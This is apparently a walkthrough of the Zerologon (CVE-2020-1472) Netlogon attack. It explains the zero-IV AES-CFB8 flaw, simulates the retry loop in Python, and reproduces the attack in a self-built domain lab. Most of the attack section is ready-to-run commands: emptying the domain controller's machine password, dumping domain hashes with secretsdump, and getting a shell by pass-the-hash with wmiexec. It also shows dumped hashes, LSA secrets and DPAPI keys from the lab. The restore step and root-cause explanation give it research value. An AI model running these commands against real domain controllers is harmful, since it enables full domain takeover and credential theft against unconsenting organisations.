Introduction
The Netlogon Remote Protocol (MS-NRPC) is an RPC interface used on Windows domain controllers for a range of tasks related to user and machine authentication. It is most commonly used to let users log on to servers with NTLM, and it is also used to authenticate NTP responses and to update computer domain passwords.
On August 11, 2020, Microsoft's MSRC published a security advisory for a Netlogon elevation-of-privilege vulnerability. It is tracked as CVE-2020-1472 with a CVSS score of 10.0, and was discovered and reported by Tom Tervoort of Secura, who named it Zerologon.
The elevation-of-privilege vulnerability exists when an attacker establishes a Netlogon secure channel connection to a domain controller using MS-NRPC. On success, an unauthenticated attacker who can reach the DC over the network can run a specially crafted application against it and obtain domain administrator privileges. The root cause is in ComputeNetlogonCredential: its AES-CFB8 variant uses a fixed all-zero IV, so an all-zero client challenge yields an all-zero credential for roughly one session key in 256. Because the session key changes on every handshake, the attacker simply retries until the server accepts an all-zero credential, then calls NetrServerPasswordSet2 to set the DC's machine account password to empty.
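The CFB8 weakness just described, as an added example written for this page (it is not Secura's PoC, dirkjanm's exploit or impacket code). It implements CFB8 over a stand-in block function built from SHA-256 so it runs with the Python standard library alone; the 1-in-256 property belongs to CFB8 with a zero IV and a zero plaintext and does not depend on which block cipher sits underneath. The session-key derivation is likewise a stand-in for the MS-NRPC one, and the handshake loop simulates the exploit's retry logic rather than sending RPC traffic:

```python
"""Zerologon root cause, as a stand-alone simulation (not Secura's PoC or impacket).

MS-NRPC's ComputeNetlogonCredential (AES variant) encrypts the 8-byte challenge
with AES-128 in CFB8 mode using a fixed IV of 16 zero bytes.  In CFB8 each
ciphertext byte is plaintext XOR the first byte of E_k(shift register), and the
register is then fed the ciphertext byte.  With a zero IV and a zero challenge
the register never changes once the first output byte is zero, so the whole
credential is zero whenever E_k(0^16)[0] == 0: about 1 key in 256.

Assumptions: block_encrypt() is a SHA-256 stand-in for the AES block function
and derive_session_key() a stand-in for the MS-NRPC key derivation, so the
script runs with the standard library only; neither changes the CFB8 property.
"""
import hashlib
import os

BLOCK = 16          # AES block size in bytes
CHALLENGE_LEN = 8   # Netlogon challenges and credentials are 8 bytes
ZERO_IV = bytes(BLOCK)


def block_encrypt(key: bytes, block: bytes) -> bytes:
    # Stand-in for AES-128 (assumption); only its first output byte matters here.
    return hashlib.sha256(key + block).digest()[:BLOCK]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Generic CFB8: one block encryption per plaintext byte."""
    shift = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = p ^ block_encrypt(key, bytes(shift))[0]
        out.append(c)
        shift = shift[1:] + bytes([c])     # feed the ciphertext byte back in
    return bytes(out)


def compute_netlogon_credential(session_key: bytes, challenge: bytes, iv: bytes = ZERO_IV) -> bytes:
    """ComputeNetlogonCredential, AES variant.  The fixed zero IV is the bug."""
    return cfb8_encrypt(session_key, iv, challenge)


def credential_is_zero(session_key: bytes, iv: bytes = ZERO_IV) -> bool:
    """Does an all-zero client challenge yield an all-zero credential?"""
    zero = bytes(CHALLENGE_LEN)
    return compute_netlogon_credential(session_key, zero, iv) == zero


def weak_key_fraction(trials: int, iv: bytes = ZERO_IV) -> float:
    """Fraction of deterministically generated keys for which the all-zero
    credential appears: ~1/256 with the zero IV, ~2^-64 with any other IV
    (every one of the 8 keystream bytes would then need its own lucky hit)."""
    keys = (hashlib.sha256(b"key%d" % i).digest()[:16] for i in range(trials))
    return sum(credential_is_zero(k, iv) for k in keys) / trials


def find_weak_session_key(label: bytes = b"key") -> bytes:
    """First deterministically generated key that passes with a zero credential."""
    i = 0
    while not credential_is_zero(hashlib.sha256(label + b"%d" % i).digest()[:16]):
        i += 1
    return hashlib.sha256(label + b"%d" % i).digest()[:16]


def derive_session_key(secret: bytes, client_chal: bytes, server_chal: bytes) -> bytes:
    # Stand-in for the MS-NRPC session-key derivation (assumption): the real one
    # is an HMAC-SHA256 construction over both challenges keyed from the machine
    # password's MD4.  What matters here: it changes with every server challenge.
    return hashlib.sha256(secret + client_chal + server_chal).digest()[:16]


def deterministic_rng(label: bytes):
    """Counter-based byte source standing in for os.urandom, for reproducible runs."""
    counter = [0]

    def rng(n: int) -> bytes:
        counter[0] += 1
        return hashlib.sha256(label + counter[0].to_bytes(4, "big")).digest()[:n]
    return rng


def zerologon_attempts(machine_secret: bytes, max_tries: int = 2000, rng=os.urandom):
    """Simulate the exploit loop.  The attacker, who does not know the secret,
    sends client challenge 0 and claims client credential 0 on every attempt;
    the server, which does know it, accepts when the real credential is 0.
    Returns the number of handshakes needed, or None if max_tries is exhausted."""
    zero = bytes(CHALLENGE_LEN)
    for attempt in range(1, max_tries + 1):
        server_chal = rng(CHALLENGE_LEN)             # fresh per NetrServerReqChallenge
        key = derive_session_key(machine_secret, zero, server_chal)
        if compute_netlogon_credential(key, zero) == zero:
            return attempt                           # NetrServerAuthenticate3 would succeed
    return None


if __name__ == "__main__":
    print("zero-IV weak-key fraction  :", weak_key_fraction(25600))
    print("random-IV weak-key fraction:", weak_key_fraction(25600, os.urandom(BLOCK)))
    print("handshakes until success   :", zerologon_attempts(os.urandom(32)))
```

Running it prints a zero-IV weak-key fraction close to 0.0039, a random-IV fraction of 0, and a handshake count that is usually a few hundred. The real exploit caps retries at 2000, which fails only with probability (255/256)^2000, about 0.04 %. After authenticating, it calls NetrServerPasswordSet2 with a zero-length password; the password blob is protected with the same zero-IV CFB8 primitive, so an all-zero blob encrypts to all zeros and the attacker needs no knowledge of the session key for that step either.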
Affected versions
Windows Server, version 2004 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Approach
Use the exploit to reset the DC's machine account password in Active Directory to empty, dump the domain hashes with that empty password, use one of the dumped user hashes to get a shell on the DC, recover the original machine account password that is still stored locally in the DC's LSA secrets, and finally use that recovered secret to restore the password that was emptied. The reset only changes the password stored in AD, not the copy the DC keeps locally, so the DC stops working correctly (replication fails, for example) until the two agree again; the restore step is not optional.
Build the domain environment locally yourself.
PoC check
https://github.com/SecuraBV/CVE-2020-1472
Exploitation
Note: install impacket first, otherwise the exploit will most likely error out.
Install it with setup.py as shown in the figure below.
Download the exploit yourself:
https://github.com/dirkjanm/CVE-2020-1472
First reset the DC's machine account password to empty (the arguments are the DC's NetBIOS name and its IP address):
python3 cve-2020-1472-exploit.py OWA2010SP3 192.168.3.142
Dump the hashes held on the DC as follows:
python3 secretsdump.py 0day.org/OWA2010SP3$@192.168.3.142 -no-pass
If the password had not been emptied, -no-pass would not work here; there is a comparison at the end, after the password has been restored.
A pile of hashes of every kind (see the figure).
Use one of the dumped user hashes to log on to the DC:
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c 0day.org/sqladmin@192.168.3.142
The commands run as shown in the figure.
Export the SAM, SYSTEM and SECURITY hives to the local machine to obtain the pre-reset machine account secret that is still stored locally on the DC.
Get the original NTLM hash from those hive files:
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
[*] Target system bootKey: 0xe2daa1c5dca47d980c9c9a95b0409760
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:dbf5b27ba7b68e257e11b31854d6f6069746b88cca37879f11c3cc3fae38012b47df0a003ab2ff2ed3672ead8b61a232b8f562b61e28bbf8562dd797ce5439fd45e75daeb1b8467ce9805bdcb76093cf6cef8bc308a679e8688bb2f0f6256c14cbbdb1e48f320ebf2c34e667db98d399ea3f02854893cbffffd0613312a3b5b4806cee2534669871e8370d5729912e43456c627799f7b539b056094724a84340aa1ee317398f86f8956364d398d45a46d9c75d57c43ee9ea839a0587b5b16728e8bedce420a27c6e9f4a6d1face53e757e275edef3159e32712b03c8f65818bd3093ac630dbf7fb1477392acf4084695
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:91f32f0af885207c73f094618f1f42bf
[*] DefaultPassword
(Unknown User):ROOT# 123
[*] DPAPI_SYSTEM
dpapi_machinekey:0x7f62c3d11ca85ac5abf5bd5adf7e3dd5b85fe81b
dpapi_userkey:0xf89205346bcaf0c5aef5933db269de40fd2f3077
[*] L$ASP.NETAutoGenKeys2.0.50727.5420
0000 79 97 4E F4 29 D1 DA DF C0 C5 63 ED 04 9C C7 05 y.N.).....c.....
0010 92 07 C5 0F 31 B0 A2 9B 8B 40 A7 5D 75 E1 43 AA ....1....@.]u.C.
0020 25 78 D0 DB 96 47 82 8A C7 AD 24 0D AF B7 B1 51 %x...G....$....Q
0030 AB B0 59 02 63 A3 03 58 65 14 FC C2 30 93 A1 DA ..Y.c..Xe...0...
0040 3D B1 8E C3 79 60 F6 86 A4 1C 02 77 A2 A8 CC D1 =...y`.....w....
0050 EB AE A9 8B 07 7E 71 C0 .....~q.
L$ASP.NETAutoGenKeys2.0.50727.5420:79974ef429d1dadfc0c563ed049cc7059207c50f31b0a29b8b40a75d75e143aa2578d0db9647828ac7ad240dafb7b151abb0590263a303586514fcc23093a1da3db18ec37960f686a41c0277a2a8ccd1ebaea98b077e71c0
[*] NL$KM
0000 63 26 83 D5 19 BE 92 EE D2 08 87 7D 9B A6 35 16 c&.........}..5.
0010 7F A7 E8 ED 0B 0E 8B A8 DF 33 35 89 F6 71 C3 53 .........35..q.S
0020 5A 1E B2 91 CA 68 F2 E4 FD 57 D8 0F 5C 4E 1B 8C Z....h...W..\N..
0030 41 FB 71 8C 5E 83 B3 FB D4 E0 5D F0 90 90 50 EE A.q.^.....]...P.
NL$KM:632683d519be92eed208877d9ba635167fa7e8ed0b0e8ba8df333589f671c3535a1eb291ca68f2e4fd57d80f5c4e1b8c41fb718c5e83b3fbd4e05df0909050ee
[*] Cleaning up...
Restore the original password with the tool at the link below; it takes the plain_password_hex value from the $MACHINE.ACC entry above, not the NT hash.
https://github.com/risksense/zerologon
Comparison before and after the restore:
E:\Python36\impacket-master\examples>python3 secretsdump.py 0day.org/sqladmin:admin!@#45@192.168.3.142 -just-dc-user OWA2010SP3$
Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
OWA2010SP3$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Kerberos keys grabbed
OWA2010SP3$:aes256-cts-hmac-sha1-96:e80b9eb05118d4a05086fd34d1c3577602f7332fe61d0498a9ec45a23ec1e5f8
OWA2010SP3$:aes128-cts-hmac-sha1-96:be60933a403c732355cca898940f6d7d
OWA2010SP3$:des-cbc-md5:0dbc7c3279fed98f
[*] Cleaning up...
E:\Python36\impacket-master\examples>python3 secretsdump.py 0day.org/sqladmin:admin!@#45@192.168.3.142 -just-dc-user OWA2010SP3$
Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
OWA2010SP3$:1000:aad3b435b51404eeaad3b435b51404ee:91f32f0af885207c73f094618f1f42bf:::
[*] Cleaning up...
E:\Python36\impacket-master\examples>
Confirm that after the restore the same approach can no longer obtain the DC's hashes:
E:\Python36\impacket-master\examples>python3 secretsdump.py 0day.org/OWA2010SP3$@192.168.3.142 -no-pass
Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[*] Cleaning up...
E:\Python36\impacket-master\examples>